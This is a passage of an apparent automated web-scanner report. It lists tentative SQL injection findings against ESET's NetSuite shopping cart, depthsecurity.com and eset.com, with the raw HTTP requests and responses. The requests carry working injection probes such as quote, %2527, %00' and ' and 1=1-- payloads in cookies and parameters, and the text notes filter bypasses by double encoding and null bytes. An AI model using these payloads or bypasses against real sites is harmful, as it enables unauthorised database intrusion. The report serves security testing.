NS_RTIMER_COMPOSITE: 1121446402:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54648

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...

1.13. http://shopping.netsuite.com/s.nl [__utma cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /s.nl?alias=&c=438708&n=1&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2%2527; __utmc=1; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:28:51 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 233654826:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 48755

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

GET /s.nl?alias=&c=438708&n=1&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2%2527%2527; __utmc=1; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:28:52 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 233655032:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54649

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...

1.14. http://shopping.netsuite.com/s.nl [__utmc cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /s.nl?alias=&c=438708&n=1&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1'; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:30:40 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -804063199:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 48736

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

GET /s.nl?alias=&c=438708&n=1&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1''; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:30:43 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2027509818:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54627

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...

1.15. http://shopping.netsuite.com/s.nl [promocode cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The promocode cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the promocode cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /s.nl?sc=3&c=438708&n=1&ext=T HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=%00'; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmb=1.3.10.1303741547; __utmc=1; mbox=session#1303736347554-914602#1303744976|PC#1303736347554-914602.17#1304952716|check#true#1303743176

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:25:14 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1248004410:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 48959

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

GET /s.nl?sc=3&c=438708&n=1&ext=T HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=%00''; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmb=1.3.10.1303741547; __utmc=1; mbox=session#1303736347554-914602#1303744976|PC#1303736347554-914602.17#1304952716|check#true#1303743176

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:25:16 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -804103430:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54845

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...

1.16. https://www.depthsecurity.com/WebResource.axd [d parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.depthsecurity.com
Path:	/WebResource.axd

Issue detail

The d parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the d parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2'%20and%201%3d1--%20&t=633978532604062500 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 1

HTTP/1.1 302 Denied
Content-Type: text/html
Location: http://www.depthsecurity.com
X-dotDefender-denied: 1
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:33 GMT
Connection: close

<html></html>

Request 2

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2'%20and%201%3d2--%20&t=633978532604062500 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6045
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Depth Security - A Trusted Information Security Partner</title>
<link rel="stylesheet" type="text/css" href="css/style.css" />
<link rel="SHORTCUT ICON" href="images/icon.jpg" />
<meta name="keywords" content="Information Security Partner, Information Security Advisor, Network Security, Web Application Security, Depth Security, Vendor Independent Security Services, Security Architecture and Design" />
<meta name="description" />
<meta name="robots" content="all" />
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
</head>
<body class="main">
<div id="page">

<div id="header-holder">
<div id="header">
<div class="logo"><a href="home.aspx"><img src="images/logo_221x53.gif" width="221" height="53" alt="DepthSecurity.com" title="DepthSecurity.com" /></a></div>

<div id="header-nav">
<div class="option"><div class="hot1"><a href="home.aspx"><img src="images/1px.gif" width="42" height="14" /></a></div></div>
<div class="option"><div class="link2"><a href="company.aspx"><img src="images/1px.gif" width="66" height="14" /></a></div></div>
<div class="option"><div class="link3"><a href="services.aspx"><img src="images/1px.gif" width="62" height="14" /></a></div></div>
<div class="option"><div class="link4"><a href="applicure-technologies-partnership.aspx"><img src="images/1px.gif" width="42" height="14" /></a></div></div>
<div class="option" style="border-right:none;"><div class="link5"><a href="contact-us.aspx"><img src="images/1px.gif" width="81" height="14" /></a></div></div>
<div class
...[SNIP]...

1.17. https://www.depthsecurity.com/WebResource.axd [t parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.depthsecurity.com
Path:	/WebResource.axd

Issue detail

The t parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the t parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2&t=633978532604062500'%20and%201%3d1--%20 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 1

Request 2

GET /WebResource.axd?d=_0LWmoUbQjyz3xspJWMQMg2&t=633978532604062500'%20and%201%3d2--%20 HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response 2

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 3005
Content-Type: application/x-javascript
Expires: Tue, 24 Apr 2012 13:10:53 GMT
Last-Modified: Thu, 31 Dec 2009 16:47:40 GMT
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:11:51 GMT

function WebForm_FindFirstFocusableChild(control) {
if (!control || !(control.tagName)) {
return null;
}
var tagName = control.tagName.toLowerCase();
if (tagName == "undefined") {
return null;
}
var children = control.childNodes;
if (children) {
for (var i = 0; i < children.length; i++) {
try {
if (WebForm_CanFocus(children[i])) {
return children[i];
}
else {
var focused = WebForm_FindFirstFocusableChild(children[i]);
if (WebForm_CanFocus(focused)) {
return focused;
}
}
} catch (e) {
}
}
}
return null;
}
function WebForm_AutoFocus(focusId) {
var targetControl;
if (__nonMSDOMBrowser) {
targetControl = document.getElementById(focusId);
}
else {
targetControl = document.all[focusId];
}
var focused = targetControl;
if (targetControl && (!WebForm_CanFocus(targetControl)) ) {
focused = WebForm_FindFirstFocusableChild(targetControl);
}
if (focused) {
try {
focused.focus();
if (__nonMSDOMBrowser) {
focused.scrollIntoView(false);
}
if (window.__smartNav) {
window.__smartNav.ae = focused.id;
}
}
catch (e) {
}
}
}
function WebForm_CanFocus(element) {
if (!element || !(element.tagName)) return false;
var tagName = element.tagName.toLowerCase();
return (!(element.disabled) &&
(!(
...[SNIP]...

1.18. http://www.eset.com/us/ [PHPSESSID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.eset.com
Path:	/us/

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the PHPSESSID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6'%20and%201%3d1--%20; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=rhlh0535fscpi8b9l3gmc676d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 15:15:10 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26653
Date: Mon, 25 Apr 2011 15:15:10 GMT
X-Varnish: 555648175
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
+"="+escape(cookieValue)
    + ";expires="+expire.toGMTString();
   }

   var speed = 'fast';

   var j = jQuery.noConflict();
       var selectedTab = 0;
   j(document).ready(function(){
       j("#bannerWrapper").css({'left': '-'+(980*selectedTab)+'px'});
       j("#tab"+selectedTab).show();
       j("#tab"+selectedTab).addClass('visible');
       j("#link_tab"+selectedTab).addClass('selected');


       j(".clicker").live('click',function(){
           var linkId = j(this).attr('id').split('_');
           var tab = linkId[1];
           var indx = null;
           j('.clicker').each(function(){
               if(j(this).hasClass('selected'))
               {

                   indx = j(this).attr('id').split('_');
                   j(this).removeClass('selected');
               }
           });

           indexNum = indx[1].replace(/[^\d]+/i,'');
           var clicked = tab.replace(/[^\d]+/i,'');

           var diff = clicked-indexNum;

           j('#bannerWrapper').animate({"left":"-="+(980*diff)},speed);


           j(this).addClass('selected');



           j('.visible').fadeOut(speed,function(){
               j(this).removeClass('visible');
               j('#'+tab).fadeIn(speed);
               j('#'+tab).addClass('visible');
               SetCookie('tab', selectedTab,-1);
               SetCookie('tab', clicked,1);
           });

           return false;
       });

   });
</script>
<style type="text/css" media="all">
   div.hidden{
       display:none;
   }
   div.visible{
       display: block;
   }

   div.page_banner{
       width: 980px;
       float: left;
   }

   div#bannerWrapper {
       width: 1960px;
       position: absolute;
       left: 0;
   }


</style>
<div style="width: 980px; overflow: hidden; height: 250px;">
   <div id="bannerWrapper" >
       <div class="page_banner" id="img_tab0">
            <a href="/us/home/smart-security"><div style="display:block; position: absolute; height: 250px; width: 980px;"></div></a>
   <h1>
       <div style="background-image:url(/us/images/banners/banner_home_ecs_pc.jpg); width:980px; height:250px;">
       <div style="position:absolute; top:127px; left: 433px">
                               <a href="/us/home/smart-security" ><img src="/us/images/sub_banner_button_buy.jpg" alt="Buy ESET Smart Security 4" style="margin-right:10px" /></a>

...[SNIP]...

Request 2

GET /us/ HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6'%20and%201%3d2--%20; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=check#true#1303736408|session#1303736347554-914602#1303738208|PC#1303736347554-914602.17#1304945949; __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=p3m54lfgguit56nu0eqstd1vf5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=4; expires=Fri, 24-Jun-2011 15:15:11 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26683
Date: Mon, 25 Apr 2011 15:15:11 GMT
X-Varnish: 555648227
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
e+"="+escape(cookieValue)
    + ";expires="+expire.toGMTString();
